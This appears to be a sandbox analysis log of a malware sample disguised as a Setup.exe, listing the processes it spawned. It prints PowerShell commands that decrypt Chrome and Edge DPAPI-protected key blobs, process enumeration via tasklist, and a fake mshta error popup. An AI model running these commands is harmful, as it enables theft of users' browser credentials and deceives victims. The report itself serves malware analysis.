Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser') |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8 |
|
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 |
|